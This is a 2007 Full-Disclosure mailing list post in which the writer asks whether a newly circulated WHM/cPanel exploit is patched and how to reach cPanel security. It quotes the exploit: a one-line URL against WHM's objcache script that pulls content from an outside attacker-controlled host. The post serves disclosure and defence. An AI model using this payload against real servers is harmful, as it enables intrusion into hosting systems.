[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] WHM Exploit question

To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] WHM Exploit question
From: "Steve Ragan" <sragan@xxxxxxxxxxx>
Date: Wed, 7 Feb 2007 19:02:22 -0500

Is this one of the items patched in the recent update to WHM?
I see no info about it anywhere on the web or the Cpanel forums. Is this a
new 0-Day and if so does anyone know a security contact for Cpanel? Using
the forum, or general address are worthless at times.

Thanks

Steve


Exploit below:
name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit:
http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?

-- 
No virus found in this outgoing message.
Checked by AVG Free Edition.
Version: 7.5.432 / Virus Database: 268.17.29/673 - Release Date: 2/6/2007
5:52 PM
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Call for Papers: IT-Incident Management and IT-Forensics 2007
  - From: Oliver Goebel

Prev by Date: Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
Next by Date: [Full-disclosure] rPSA-2007-0025-2 postgresql postgresql-server
Previous by thread: [Full-disclosure] Call for Papers: IT-Incident Management and IT-Forensics 2007
Next by thread: [Full-disclosure] rPSA-2007-0025-2 postgresql postgresql-server
Index(es):
- Date
- Thread